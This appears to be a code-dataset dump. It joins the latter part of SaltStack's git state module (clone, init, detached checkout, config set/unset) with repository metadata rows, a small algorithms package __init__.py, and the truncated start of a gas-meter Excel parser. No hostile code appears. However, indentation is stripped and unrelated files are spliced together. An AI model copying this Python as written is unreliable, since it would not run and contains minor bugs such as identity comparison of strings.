except Exception as exc:
log.error(
'Unexpected exception in git.latest state',
exc_info=True
)
if isinstance(exc, CommandExecutionError):
msg = _strip_exc(exc)
else:
msg = str(exc)
return _fail(ret, msg, comments)
if not bare and not _revs_equal(new_rev,
remote_rev,
remote_rev_type):
return _fail(ret, 'Failed to update repository', comments)
if local_rev != new_rev:
log.info(
'Repository {0} updated: {1} => {2}'.format(
target, local_rev, new_rev)
)
ret['comment'] = _format_comments(comments)
ret['changes']['revision'] = {'old': local_rev, 'new': new_rev}
else:
return _uptodate(ret, target, _format_comments(comments))
else:
if os.path.isdir(target):
if force_clone:
# Clone is required, and target directory exists, but the
# ``force`` option is enabled, so we need to clear out its
# contents to proceed.
if __opts__['test']:
ret['changes']['forced clone'] = True
ret['changes']['new'] = name + ' => ' + target
return _neutral_test(
ret,
'Target directory {0} exists. Since force_clone=True, '
'the contents of {0} would be deleted, and {1} would '
'be cloned into this directory.'.format(target, name)
)
log.debug(
'Removing contents of {0} to clone repository {1} in its '
'place (force_clone=True set in git.latest state)'
.format(target, name)
)
try:
if os.path.islink(target):
os.unlink(target)
else:
salt.utils.rm_rf(target)
except OSError as exc:
return _fail(
ret,
'Unable to remove {0}: {1}'.format(target, exc),
comments
)
else:
ret['changes']['forced clone'] = True
# Clone is required, but target dir exists and is non-empty. We
# can't proceed.
elif os.listdir(target):
return _fail(
ret,
'Target \'{0}\' exists, is non-empty and is not a git '
'repository. Set the \'force_clone\' option to True to '
'remove this directory\'s contents and proceed with '
'cloning the remote repository'.format(target)
)
log.debug(
'Target {0} is not found, \'git clone\' is required'.format(target)
)
if __opts__['test']:
ret['changes']['new'] = name + ' => ' + target
return _neutral_test(
ret,
'Repository {0} would be cloned to {1}'.format(
name, target
)
)
try:
clone_opts = ['--mirror'] if mirror else ['--bare'] if bare else []
if remote != 'origin':
clone_opts.extend(['--origin', remote])
if depth is not None:
clone_opts.extend(['--depth', str(depth)])
# We're cloning a fresh repo, there is no local branch or revision
local_branch = local_rev = None
try:
__salt__['git.clone'](target,
name,
user=user,
password=password,
opts=clone_opts,
identity=identity,
https_user=https_user,
https_pass=https_pass,
saltenv=__env__)
except CommandExecutionError as exc:
msg = 'Clone failed: {0}'.format(_strip_exc(exc))
return _fail(ret, msg, comments)
ret['changes']['new'] = name + ' => ' + target
comments.append(
'{0} cloned to {1}{2}'.format(
name,
target,
' as mirror' if mirror
else ' as bare repository' if bare
else ''
)
)
if not bare:
if not remote_rev:
if rev != 'HEAD':
# No HEAD means the remote repo is empty, which means
# our new clone will also be empty. This state has
# failed, since a rev was specified but no matching rev
# exists on the remote host.
msg = (
'{{0}} was cloned but is empty, so {0}/{1} '
'cannot be checked out'.format(remote, rev)
)
log.error(msg.format(name))
return _fail(ret, msg.format('Repository'), comments)
else:
if remote_rev_type == 'tag' \
and rev not in __salt__['git.list_tags'](
target, user=user, password=password):
return _fail(
ret,
'Revision \'{0}\' does not exist in clone'
.format(rev),
comments
)
if branch is not None:
if branch not in \
__salt__['git.list_branches'](
target,
user=user,
password=password):
if rev == 'HEAD':
checkout_rev = remote_rev
else:
checkout_rev = desired_upstream \
if desired_upstream \
else rev
__salt__['git.checkout'](target,
checkout_rev,
opts=['-b', branch],
user=user,
password=password)
comments.append(
'Branch \'{0}\' checked out, with {1} '
'as a starting point'.format(
branch,
remote_loc
)
)
local_rev, local_branch = \
_get_local_rev_and_branch(target, user, password)
if local_branch is None \
and remote_rev is not None \
and 'HEAD' not in all_remote_refs:
return _fail(
ret,
'Remote HEAD refers to a ref that does not exist. '
'This can happen when the default branch on the '
'remote repository is renamed or deleted. If you '
'are unable to fix the remote repository, you can '
'work around this by setting the \'branch\' argument '
'(which will ensure that the named branch is created '
'if it does not already exist).',
comments
)
if not _revs_equal(local_rev, remote_rev, remote_rev_type):
__salt__['git.reset'](
target,
opts=['--hard', remote_rev],
user=user,
password=password)
comments.append(
'Repository was reset to {0}'.format(remote_loc)
)
try:
upstream = __salt__['git.rev_parse'](
target,
local_branch + '@{upstream}',
opts=['--abbrev-ref'],
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
upstream = False
if not upstream and desired_upstream:
upstream_action = (
'Tracking branch was set to {0}'.format(
desired_upstream
)
)
branch_opts = _get_branch_opts(
branch,
local_branch,
__salt__['git.list_branches'](target,
user=user,
password=password),
desired_upstream,
git_ver)
elif upstream and desired_upstream is False:
# If the remote_rev is a tag or SHA1, and there is an
# upstream tracking branch, we will unset it. However,
# we can only do this if the git version is 1.8.0 or
# newer, as the --unset-upstream option was not added
# until that version.
if git_ver >= _LooseVersion('1.8.0'):
upstream_action = 'Tracking branch was unset'
branch_opts = ['--unset-upstream']
else:
branch_opts = None
elif desired_upstream and upstream != desired_upstream:
upstream_action = (
'Tracking branch was updated to {0}'.format(
desired_upstream
)
)
branch_opts = _get_branch_opts(
branch,
local_branch,
__salt__['git.list_branches'](target,
user=user,
password=password),
desired_upstream,
git_ver)
else:
branch_opts = None
if branch_opts is not None:
__salt__['git.branch'](
target,
opts=branch_opts,
user=user,
password=password)
comments.append(upstream_action)
if submodules and remote_rev:
try:
__salt__['git.submodule'](target,
'update',
opts=['--init', '--recursive'],
user=user,
password=password,
identity=identity)
except CommandExecutionError as exc:
return _failed_submodule_update(ret, exc, comments)
try:
new_rev = __salt__['git.revision'](
cwd=target,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
new_rev = None
except Exception as exc:
log.error(
'Unexpected exception in git.latest state',
exc_info=True
)
if isinstance(exc, CommandExecutionError):
msg = _strip_exc(exc)
else:
msg = str(exc)
return _fail(ret, msg, comments)
msg = _format_comments(comments)
log.info(msg)
ret['comment'] = msg
if new_rev is not None:
ret['changes']['revision'] = {'old': None, 'new': new_rev}
return ret
def present(name,
force=False,
bare=True,
template=None,
separate_git_dir=None,
shared=None,
user=None,
password=None):
'''
Ensure that a repository exists in the given directory
.. warning::
If the minion has Git 2.5 or later installed, ``name`` points to a
worktree_, and ``force`` is set to ``True``, then the worktree will be
deleted. This has been corrected in Salt 2015.8.0.
name
Path to the directory
.. versionchanged:: 2015.8.0
This path must now be absolute
force : False
If ``True``, and if ``name`` points to an existing directory which does
not contain a git repository, then the contents of that directory will
be recursively removed and a new repository will be initialized in its
place.
bare : True
If ``True``, and a repository must be initialized, then the repository
will be a bare repository.
.. note::
This differs from the default behavior of :py:func:`git.init
<salt.modules.git.init>`, make sure to set this value to ``False``
if a bare repo is not desired.
template
If a new repository is initialized, this argument will specify an
alternate `template directory`_
.. versionadded:: 2015.8.0
separate_git_dir
If a new repository is initialized, this argument will specify an
alternate ``$GIT_DIR``
.. versionadded:: 2015.8.0
shared
Set sharing permissions on git repo. See `git-init(1)`_ for more
details.
.. versionadded:: 2015.5.0
user
User under which to run git commands. By default, commands are run by
the user under which the minion is running.
.. versionadded:: 0.17.0
password
Windows only. Required when specifying ``user``. This parameter will be
ignored on non-Windows platforms.
.. versionadded:: 2016.3.4
.. _`git-init(1)`: http://git-scm.com/docs/git-init
.. _`worktree`: http://git-scm.com/docs/git-worktree
'''
ret = {'name': name, 'result': True, 'comment': '', 'changes': {}}
# If the named directory is a git repo return True
if os.path.isdir(name):
if bare and os.path.isfile(os.path.join(name, 'HEAD')):
return ret
elif not bare and \
(os.path.isdir(os.path.join(name, '.git')) or
__salt__['git.is_worktree'](name, user=user, password=password)):
return ret
# Directory exists and is not a git repo, if force is set destroy the
# directory and recreate, otherwise throw an error
elif force:
# Directory exists, and the ``force`` option is enabled, so we need
# to clear out its contents to proceed.
if __opts__['test']:
ret['changes']['new'] = name
ret['changes']['forced init'] = True
return _neutral_test(
ret,
'Target directory {0} exists. Since force=True, the '
'contents of {0} would be deleted, and a {1}repository '
'would be initialized in its place.'
.format(name, 'bare ' if bare else '')
)
log.debug(
'Removing contents of {0} to initialize {1}repository in its '
'place (force=True set in git.present state)'
.format(name, 'bare ' if bare else '')
)
try:
if os.path.islink(name):
os.unlink(name)
else:
salt.utils.rm_rf(name)
except OSError as exc:
return _fail(
ret,
'Unable to remove {0}: {1}'.format(name, exc)
)
else:
ret['changes']['forced init'] = True
elif os.listdir(name):
return _fail(
ret,
'Target \'{0}\' exists, is non-empty, and is not a git '
'repository. Set the \'force\' option to True to remove '
'this directory\'s contents and proceed with initializing a '
'repository'.format(name)
)
# Run test is set
if __opts__['test']:
ret['changes']['new'] = name
return _neutral_test(
ret,
'New {0}repository would be created'.format(
'bare ' if bare else ''
)
)
__salt__['git.init'](cwd=name,
bare=bare,
template=template,
separate_git_dir=separate_git_dir,
shared=shared,
user=user,
password=password)
actions = [
'Initialized {0}repository in {1}'.format(
'bare ' if bare else '',
name
)
]
if template:
actions.append('Template directory set to {0}'.format(template))
if separate_git_dir:
actions.append('Gitdir set to {0}'.format(separate_git_dir))
message = '. '.join(actions)
if len(actions) > 1:
message += '.'
log.info(message)
ret['changes']['new'] = name
ret['comment'] = message
return ret
def detached(name,
ref,
target=None,
remote='origin',
user=None,
password=None,
force_clone=False,
force_checkout=False,
fetch_remote=True,
hard_reset=False,
submodules=False,
identity=None,
https_user=None,
https_pass=None,
onlyif=False,
unless=False,
**kwargs):
'''
.. versionadded:: 2016.3.0
Make sure a repository is cloned to the given target directory and is
a detached HEAD checkout of the commit ID resolved from ``ref``.
name
Address of the remote repository.
ref
The branch, tag, or commit ID to checkout after clone.
If a branch or tag is specified it will be resolved to a commit ID
and checked out.
target
Name of the target directory where repository is about to be cloned.
remote : origin
Git remote to use. If this state needs to clone the repo, it will clone
it using this value as the initial remote name. If the repository
already exists, and a remote by this name is not present, one will be
added.
user
User under which to run git commands. By default, commands are run by
the user under which the minion is running.
password
Windows only. Required when specifying ``user``. This parameter will be
ignored on non-Windows platforms.
.. versionadded:: 2016.3.4
force_clone : False
If the ``target`` directory exists and is not a git repository, then
this state will fail. Set this argument to ``True`` to remove the
contents of the target directory and clone the repo into it.
force_checkout : False
When checking out the revision ID, the state will fail if there are
unwritten changes. Set this argument to ``True`` to discard unwritten
changes when checking out.
fetch_remote : True
If ``False`` a fetch will not be performed and only local refs
will be reachable.
hard_reset : False
If ``True`` a hard reset will be performed before the checkout and any
uncommitted modifications to the working directory will be discarded.
Untracked files will remain in place.
.. note::
Changes resulting from a hard reset will not trigger requisites.
submodules : False
Update submodules
identity
A path on the minion (or a SaltStack fileserver URL, e.g.
``salt://path/to/identity_file``) to a private key to use for SSH
authentication.
https_user
HTTP Basic Auth username for HTTPS (only) clones
https_pass
HTTP Basic Auth password for HTTPS (only) clones
onlyif
A command to run as a check, run the named command only if the command
passed to the ``onlyif`` option returns true
unless
A command to run as a check, only run the named command if the command
passed to the ``unless`` option returns false
'''
ret = {'name': name, 'result': True, 'comment': '', 'changes': {}}
kwargs = salt.utils.clean_kwargs(**kwargs)
if kwargs:
return _fail(
ret,
salt.utils.invalid_kwargs(kwargs, raise_exc=False)
)
if not ref:
return _fail(
ret,
'\'{0}\' is not a valid value for the \'ref\' argument'.format(ref)
)
if not target:
return _fail(
ret,
'\'{0}\' is not a valid value for the \'target\' argument'.format(ref)
)
# Ensure that certain arguments are strings to ensure that comparisons work
if not isinstance(ref, six.string_types):
ref = str(ref)
if target is not None:
if not isinstance(target, six.string_types):
target = str(target)
if not os.path.isabs(target):
return _fail(
ret,
'Target \'{0}\' is not an absolute path'.format(target)
)
if user is not None and not isinstance(user, six.string_types):
user = str(user)
if remote is not None and not isinstance(remote, six.string_types):
remote = str(remote)
if identity is not None:
if isinstance(identity, six.string_types):
identity = [identity]
elif not isinstance(identity, list):
return _fail(ret, 'Identity must be either a list or a string')
for ident_path in identity:
if 'salt://' in ident_path:
try:
ident_path = __salt__['cp.cache_file'](ident_path)
except IOError as exc:
log.error(
'Failed to cache {0}: {1}'.format(ident_path, exc)
)
return _fail(
ret,
'Identity \'{0}\' does not exist.'.format(
ident_path
)
)
if not os.path.isabs(ident_path):
return _fail(
ret,
'Identity \'{0}\' is not an absolute path'.format(
ident_path
)
)
if https_user is not None and not isinstance(https_user, six.string_types):
https_user = str(https_user)
if https_pass is not None and not isinstance(https_pass, six.string_types):
https_pass = str(https_pass)
if os.path.isfile(target):
return _fail(
ret,
'Target \'{0}\' exists and is a regular file, cannot proceed'
.format(target)
)
try:
desired_fetch_url = salt.utils.url.add_http_basic_auth(
name,
https_user,
https_pass,
https_only=True
)
except ValueError as exc:
return _fail(ret, exc.__str__())
redacted_fetch_url = salt.utils.url.redact_http_basic_auth(desired_fetch_url)
# Check if onlyif or unless conditions match
run_check_cmd_kwargs = {'runas': user}
if 'shell' in __grains__:
run_check_cmd_kwargs['shell'] = __grains__['shell']
cret = mod_run_check(
run_check_cmd_kwargs, onlyif, unless
)
if isinstance(cret, dict):
ret.update(cret)
return ret
# Determine if supplied ref is a hash
remote_ref_type = 'ref'
if len(ref) <= 40 \
and all(x in string.hexdigits for x in ref):
ref = ref.lower()
remote_ref_type = 'hash'
comments = []
hash_exists_locally = False
local_commit_id = None
gitdir = os.path.join(target, '.git')
if os.path.isdir(gitdir) \
or __salt__['git.is_worktree'](target, user=user, password=password):
# Target directory is a git repository or git worktree
local_commit_id = _get_local_rev_and_branch(target, user, password)[0]
if remote_ref_type is 'hash' \
and __salt__['git.describe'](target,
ref,
user=user,
password=password):
# The ref is a hash and it exists locally so skip to checkout
hash_exists_locally = True
else:
# Check that remote is present and set to correct url
remotes = __salt__['git.remotes'](target,
user=user,
password=password,
redact_auth=False)
if remote in remotes and name in remotes[remote]['fetch']:
pass
else:
# The fetch_url for the desired remote does not match the
# specified URL (or the remote does not exist), so set the
# remote URL.
current_fetch_url = None
if remote in remotes:
current_fetch_url = remotes[remote]['fetch']
if __opts__['test']:
return _neutral_test(
ret,
'Remote {0} would be set to {1}'.format(
remote, name
)
)
__salt__['git.remote_set'](target,
url=name,
remote=remote,
user=user,
password=password,
https_user=https_user,
https_pass=https_pass)
comments.append(
'Remote {0} updated from \'{1}\' to \'{2}\''.format(
remote,
str(current_fetch_url),
name
)
)
else:
# Clone repository
if os.path.isdir(target):
if force_clone:
# Clone is required, and target directory exists, but the
# ``force`` option is enabled, so we need to clear out its
# contents to proceed.
if __opts__['test']:
return _neutral_test(
ret,
'Target directory {0} exists. Since force_clone=True, '
'the contents of {0} would be deleted, and {1} would '
'be cloned into this directory.'.format(target, name)
)
log.debug(
'Removing contents of {0} to clone repository {1} in its '
'place (force_clone=True set in git.detached state)'
.format(target, name)
)
try:
if os.path.islink(target):
os.unlink(target)
else:
salt.utils.rm_rf(target)
except OSError as exc:
return _fail(
ret,
'Unable to remove {0}: {1}'.format(target, exc),
comments
)
else:
ret['changes']['forced clone'] = True
elif os.listdir(target):
# Clone is required, but target dir exists and is non-empty. We
# can't proceed.
return _fail(
ret,
'Target \'{0}\' exists, is non-empty and is not a git '
'repository. Set the \'force_clone\' option to True to '
'remove this directory\'s contents and proceed with '
'cloning the remote repository'.format(target)
)
log.debug(
'Target {0} is not found, \'git clone\' is required'.format(target)
)
if __opts__['test']:
return _neutral_test(
ret,
'Repository {0} would be cloned to {1}'.format(
name, target
)
)
try:
clone_opts = ['--no-checkout']
if remote != 'origin':
clone_opts.extend(['--origin', remote])
__salt__['git.clone'](target,
name,
user=user,
password=password,
opts=clone_opts,
identity=identity,
https_user=https_user,
https_pass=https_pass,
saltenv=__env__)
comments.append(
'{0} cloned to {1}'.format(
name,
target
)
)
except Exception as exc:
log.error(
'Unexpected exception in git.detached state',
exc_info=True
)
if isinstance(exc, CommandExecutionError):
msg = _strip_exc(exc)
else:
msg = str(exc)
return _fail(ret, msg, comments)
# Repository exists and is ready for fetch/checkout
refspecs = [
'refs/heads/*:refs/remotes/{0}/*'.format(remote),
'+refs/tags/*:refs/tags/*'
]
if hash_exists_locally or fetch_remote is False:
pass
else:
# Fetch refs from remote
if __opts__['test']:
return _neutral_test(
ret,
'Repository remote {0} would be fetched'.format(
remote
)
)
try:
fetch_changes = __salt__['git.fetch'](
target,
remote=remote,
force=True,
refspecs=refspecs,
user=user,
password=password,
identity=identity,
saltenv=__env__)
except CommandExecutionError as exc:
msg = 'Fetch failed'
msg += ':\n\n' + str(exc)
return _fail(ret, msg, comments)
else:
if fetch_changes:
comments.append(
'Remote {0} was fetched, resulting in updated '
'refs'.format(remote)
)
#get refs and checkout
checkout_commit_id = ''
if remote_ref_type is 'hash':
if __salt__['git.describe'](target, ref, user=user, password=password):
checkout_commit_id = ref
else:
return _fail(
ret,
'Ref does not exist: {0}'.format(ref)
)
else:
try:
all_remote_refs = __salt__['git.remote_refs'](
target,
user=user,
password=password,
identity=identity,
https_user=https_user,
https_pass=https_pass,
ignore_retcode=False)
if 'refs/remotes/'+remote+'/'+ref in all_remote_refs:
checkout_commit_id = all_remote_refs['refs/remotes/'+remote+'/'+ref]
elif 'refs/tags/'+ref in all_remote_refs:
checkout_commit_id = all_remote_refs['refs/tags/'+ref]
else:
return _fail(
ret,
'Ref {0} does not exist'.format(ref)
)
except CommandExecutionError as exc:
return _fail(
ret,
'Failed to list refs for {0}: {1}'.format(remote, _strip_exc(exc))
)
if hard_reset:
if __opts__['test']:
return _neutral_test(
ret,
'Hard reset to HEAD would be performed on {0}'.format(
target
)
)
__salt__['git.reset'](
target,
opts=['--hard', 'HEAD'],
user=user,
password=password)
comments.append(
'Repository was reset to HEAD before checking out ref'
)
# TODO: implement clean function for git module and add clean flag
if checkout_commit_id == local_commit_id:
new_rev = None
else:
if __opts__['test']:
ret['changes']['HEAD'] = {'old': local_commit_id, 'new': checkout_commit_id}
return _neutral_test(
ret,
'Commit ID {0} would be checked out at {1}'.format(
checkout_commit_id,
target
)
)
__salt__['git.checkout'](target,
checkout_commit_id,
force=force_checkout,
user=user,
password=password)
comments.append(
'Commit ID {0} was checked out at {1}'.format(
checkout_commit_id,
target
)
)
try:
new_rev = __salt__['git.revision'](
cwd=target,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
new_rev = None
if submodules:
__salt__['git.submodule'](target,
'update',
opts=['--init', '--recursive'],
user=user,
password=password,
identity=identity)
comments.append(
'Submodules were updated'
)
if new_rev is not None:
ret['changes']['HEAD'] = {'old': local_commit_id, 'new': new_rev}
else:
comments.append("Already checked out at correct revision")
msg = _format_comments(comments)
log.info(msg)
ret['comment'] = msg
return ret
def config_unset(name,
value_regex=None,
repo=None,
user=None,
password=None,
**kwargs):
r'''
.. versionadded:: 2015.8.0
Ensure that the named config key is not present
name
The name of the configuration key to unset. This value can be a regex,
but the regex must match the entire key name. For example, ``foo\.``
would not match all keys in the ``foo`` section, it would be necessary
to use ``foo\..+`` to do so.
value_regex
Regex indicating the values to unset for the matching key(s)
.. note::
This option behaves differently depending on whether or not ``all``
is set to ``True``. If it is, then all values matching the regex
will be deleted (this is the only way to delete multiple values
from a multivar). If ``all`` is set to ``False``, then this state
will fail if the regex matches more than one value in a multivar.
all : False
If ``True``, unset all matches
repo
Location of the git repository for which the config value should be
set. Required unless ``global`` is set to ``True``.
user
User under which to run git commands. By default, commands are run by
the user under which the minion is running.
password
Windows only. Required when specifying ``user``. This parameter will be
ignored on non-Windows platforms.
.. versionadded:: 2016.3.4
global : False
If ``True``, this will set a global git config option
**Examples:**
.. code-block:: yaml
# Value matching 'baz'
mylocalrepo:
git.config_unset:
- name: foo.bar
- value_regex: 'baz'
- repo: /path/to/repo
# Ensure entire multivar is unset
mylocalrepo:
git.config_unset:
- name: foo.bar
- all: True
# Ensure all variables in 'foo' section are unset, including multivars
mylocalrepo:
git.config_unset:
- name: 'foo\..+'
- all: True
# Ensure that global config value is unset
mylocalrepo:
git.config_unset:
- name: foo.bar
- global: True
'''
ret = {'name': name,
'changes': {},
'result': True,
'comment': 'No matching keys are set'}
# Sanitize kwargs and make sure that no invalid ones were passed. This
# allows us to accept 'global' as an argument to this function without
# shadowing global(), while also not allowing unwanted arguments to be
# passed.
kwargs = salt.utils.clean_kwargs(**kwargs)
global_ = kwargs.pop('global', False)
all_ = kwargs.pop('all', False)
if kwargs:
return _fail(
ret,
salt.utils.invalid_kwargs(kwargs, raise_exc=False)
)
if not global_ and not repo:
return _fail(
ret,
'Non-global config options require the \'repo\' argument to be '
'set'
)
if not isinstance(name, six.string_types):
name = str(name)
if value_regex is not None:
if not isinstance(value_regex, six.string_types):
value_regex = str(value_regex)
# Ensure that the key regex matches the full key name
key = '^' + name.lstrip('^').rstrip('$') + '$'
# Get matching keys/values
pre_matches = __salt__['git.config_get_regexp'](
cwd=repo,
key=key,
value_regex=value_regex,
user=user,
password=password,
ignore_retcode=True,
**{'global': global_}
)
if not pre_matches:
# No changes need to be made
return ret
# Perform sanity check on the matches. We can't proceed if the value_regex
# matches more than one value in a given key, and 'all' is not set to True
if not all_:
greedy_matches = ['{0} ({1})'.format(x, ', '.join(y))
for x, y in six.iteritems(pre_matches)
if len(y) > 1]
if greedy_matches:
if value_regex is not None:
return _fail(
ret,
'Multiple values are matched by value_regex for the '
'following keys (set \'all\' to True to force removal): '
'{0}'.format('; '.join(greedy_matches))
)
else:
return _fail(
ret,
'Multivar(s) matched by the key expression (set \'all\' '
'to True to force removal): {0}'.format(
'; '.join(greedy_matches)
)
)
if __opts__['test']:
ret['changes'] = pre_matches
return _neutral_test(
ret,
'{0} key(s) would have value(s) unset'.format(len(pre_matches))
)
if value_regex is None:
pre = pre_matches
else:
# Get all keys matching the key expression, so we can accurately report
# on changes made.
pre = __salt__['git.config_get_regexp'](
cwd=repo,
key=key,
value_regex=None,
user=user,
password=password,
ignore_retcode=True,
**{'global': global_}
)
failed = []
# Unset the specified value(s). There is no unset for regexes so loop
# through the pre_matches dict and unset each matching key individually.
for key_name in pre_matches:
try:
__salt__['git.config_unset'](
cwd=repo,
key=name,
value_regex=value_regex,
all=all_,
user=user,
password=password,
**{'global': global_}
)
except CommandExecutionError as exc:
msg = 'Failed to unset \'{0}\''.format(key_name)
if value_regex is not None:
msg += ' using value_regex \'{1}\''
msg += ': ' + _strip_exc(exc)
log.error(msg)
failed.append(key_name)
if failed:
return _fail(
ret,
'Error(s) occurred unsetting values for the following keys (see '
'the minion log for details): {0}'.format(', '.join(failed))
)
post = __salt__['git.config_get_regexp'](
cwd=repo,
key=key,
value_regex=None,
user=user,
password=password,
ignore_retcode=True,
**{'global': global_}
)
for key_name in pre:
if key_name not in post:
ret['changes'][key_name] = pre[key_name]
unset = [x for x in pre[key_name] if x not in post[key_name]]
if unset:
ret['changes'][key_name] = unset
if value_regex is None:
post_matches = post
else:
post_matches = __salt__['git.config_get_regexp'](
cwd=repo,
key=key,
value_regex=value_regex,
user=user,
password=password,
ignore_retcode=True,
**{'global': global_}
)
if post_matches:
failed = ['{0} ({1})'.format(x, ', '.join(y))
for x, y in six.iteritems(post_matches)]
return _fail(
ret,
'Failed to unset value(s): {0}'.format('; '.join(failed))
)
ret['comment'] = 'Value(s) successfully unset'
return ret
def config_set(name,
value=None,
multivar=None,
repo=None,
user=None,
password=None,
**kwargs):
'''
.. versionadded:: 2014.7.0
.. versionchanged:: 2015.8.0
Renamed from ``git.config`` to ``git.config_set``. For earlier
versions, use ``git.config``.
Ensure that a config value is set to the desired value(s)
name
Name of the git config value to set
value
Set a single value for the config item
multivar
Set multiple values for the config item
.. note::
The order matters here, if the same parameters are set but in a
different order, they will be removed and replaced in the order
specified.
.. versionadded:: 2015.8.0
repo
Location of the git repository for which the config value should be
set. Required unless ``global`` is set to ``True``.
user
User under which to run git commands. By default, the commands are run
by the user under which the minion is running.
password
Windows only. Required when specifying ``user``. This parameter will be
ignored on non-Windows platforms.
.. versionadded:: 2016.3.4
global : False
If ``True``, this will set a global git config option
**Local Config Example:**
.. code-block:: yaml
# Single value
mylocalrepo:
git.config_set:
- name: user.email
- value: foo@bar.net
- repo: /path/to/repo
# Multiple values
mylocalrepo:
git.config_set:
- name: mysection.myattribute
- multivar:
- foo
- bar
- baz
- repo: /path/to/repo
**Global Config Example (User ``foo``):**
.. code-block:: yaml
mylocalrepo:
git.config_set:
- name: user.name
- value: Foo Bar
- user: foo
- global: True
'''
ret = {'name': name,
'changes': {},
'result': True,
'comment': ''}
if value is not None and multivar is not None:
return _fail(
ret,
'Only one of \'value\' and \'multivar\' is permitted'
)
# Sanitize kwargs and make sure that no invalid ones were passed. This
# allows us to accept 'global' as an argument to this function without
# shadowing global(), while also not allowing unwanted arguments to be
# passed.
kwargs = salt.utils.clean_kwargs(**kwargs)
global_ = kwargs.pop('global', False)
if kwargs:
return _fail(
ret,
salt.utils.invalid_kwargs(kwargs, raise_exc=False)
)
if not global_ and not repo:
return _fail(
ret,
'Non-global config options require the \'repo\' argument to be '
'set'
)
if not isinstance(name, six.string_types):
name = str(name)
if value is not None:
if not isinstance(value, six.string_types):
value = str(value)
value_comment = '\'' + value + '\''
desired = [value]
if multivar is not None:
if not isinstance(multivar, list):
try:
multivar = multivar.split(',')
except AttributeError:
multivar = str(multivar).split(',')
else:
new_multivar = []
for item in multivar:
if isinstance(item, six.string_types):
new_multivar.append(item)
else:
new_multivar.append(str(item))
multivar = new_multivar
value_comment = multivar
desired = multivar
# Get current value
pre = __salt__['git.config_get'](
cwd=repo,
key=name,
user=user,
password=password,
ignore_retcode=True,
**{'all': True, 'global': global_}
)
if desired == pre:
ret['comment'] = '{0}\'{1}\' is already set to {2}'.format(
'Global key ' if global_ else '',
name,
value_comment
)
return ret
if __opts__['test']:
ret['changes'] = {'old': pre, 'new': desired}
msg = '{0}\'{1}\' would be {2} {3}'.format(
'Global key ' if global_ else '',
name,
'added as' if pre is None else 'set to',
value_comment
)
return _neutral_test(ret, msg)
try:
# Set/update config value
post = __salt__['git.config_set'](
cwd=repo,
key=name,
value=value,
multivar=multivar,
user=user,
password=password,
**{'global': global_}
)
except CommandExecutionError as exc:
return _fail(
ret,
'Failed to set {0}\'{1}\' to {2}: {3}'.format(
'global key ' if global_ else '',
name,
value_comment,
_strip_exc(exc)
)
)
if pre != post:
ret['changes'][name] = {'old': pre, 'new': post}
if post != desired:
return _fail(
ret,
'Failed to set {0}\'{1}\' to {2}'.format(
'global key ' if global_ else '',
name,
value_comment
)
)
ret['comment'] = '{0}\'{1}\' was {2} {3}'.format(
'Global key ' if global_ else '',
name,
'added as' if pre is None else 'set to',
value_comment
)
return ret
def mod_run_check(cmd_kwargs, onlyif, unless):
'''
Execute the onlyif and unless logic. Return a result dict if:
* onlyif failed (onlyif != 0)
* unless succeeded (unless == 0)
Otherwise, returns ``True``
'''
cmd_kwargs = copy.deepcopy(cmd_kwargs)
cmd_kwargs['python_shell'] = True
if onlyif:
if __salt__['cmd.retcode'](onlyif, **cmd_kwargs) != 0:
return {'comment': 'onlyif execution failed',
'skip_watch': True,
'result': True}
if unless:
if __salt__['cmd.retcode'](unless, **cmd_kwargs) == 0:
return {'comment': 'unless execution succeeded',
'skip_watch': True,
'result': True}
# No reason to stop, return True
return True
| 38.790061
| 112
| 0.466843
|
4a022ca98d5379cda977460141b61b06616cd665
| 297
|
py
|
Python
|
conversion/__init__.py
|
kallyas/PythonAlgorithms
|
e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80
|
[
"MIT"
] | 1
|
2022-02-23T19:22:44.000Z
|
2022-02-23T19:22:44.000Z
|
conversion/__init__.py
|
kallyas/PythonAlgorithms
|
e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80
|
[
"MIT"
] | null | null | null |
conversion/__init__.py
|
kallyas/PythonAlgorithms
|
e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80
|
[
"MIT"
] | null | null | null |
from .binary_to_decimal import binary_to_decimal
from .decimal_to_binary import decimal_to_binary
from .hexa_decimal_to_decimal import hexa_decimal_to_decimal
from .decimal_to_hexa import decimal_to_hexa
from .octal_to_decimal import octal_to_decimal
from .decimal_to_octal import decimal_to_octal
| 49.5
| 60
| 0.902357
|
4a022d98f1327fb09e40d480dceac2346563f08e
| 6,007
|
py
|
Python
|
pygazpar/datafileparser.py
|
LudovicRousseau/PyGazpar
|
ca1dd1c7a099a9722cdd98e24b4f8c30e2efcaa8
|
[
"MIT"
] | null | null | null |
pygazpar/datafileparser.py
|
LudovicRousseau/PyGazpar
|
ca1dd1c7a099a9722cdd98e24b4f8c30e2efcaa8
|
[
"MIT"
] | null | null | null |
pygazpar/datafileparser.py
|
LudovicRousseau/PyGazpar
|
ca1dd1c7a099a9722cdd98e24b4f8c30e2efcaa8
|
[
"MIT"
] | null | null | null |
import logging
from datetime import datetime
from pygazpar.enum import Frequency
from pygazpar.enum import PropertyName
from openpyxl.worksheet.worksheet import Worksheet
from openpyxl.cell.cell import Cell
from openpyxl import load_workbook
FIRST_DATA_LINE_NUMBER = 10
# ------------------------------------------------------------------------------------------------------------
class DataFileParser:
logger = logging.getLogger(__name__)
# ------------------------------------------------------
@staticmethod
def parse(dataFilename: str, dataReadingFrequency: Frequency) -> list:
parseByFrequency = {
Frequency.HOURLY: DataFileParser.__parseHourly,
Frequency.DAILY: DataFileParser.__parseDaily,
Frequency.WEEKLY: DataFileParser.__parseWeekly,
Frequency.MONTHLY: DataFileParser.__parseMonthly
}
# worksheetNameByFrequency = {
# Frequency.HOURLY: "Historique par heure",
# Frequency.DAILY: "Historique par jour",
# Frequency.WEEKLY: "Historique par semaine",
# Frequency.MONTHLY: "Historique par mois"
# }
DataFileParser.logger.debug(f"Loading Excel data file '{dataFilename}'...")
workbook = load_workbook(filename=dataFilename)
# worksheet = workbook[worksheetNameByFrequency[dataReadingFrequency]]
worksheet = workbook.active
res = parseByFrequency[dataReadingFrequency](worksheet)
workbook.close()
return res
# ------------------------------------------------------
@staticmethod
def __fillRow(row: dict, propertyName: str, cell: Cell, isNumber: bool):
if cell.value is not None:
if isNumber:
if type(cell.value) is str:
if len(cell.value.strip()) > 0:
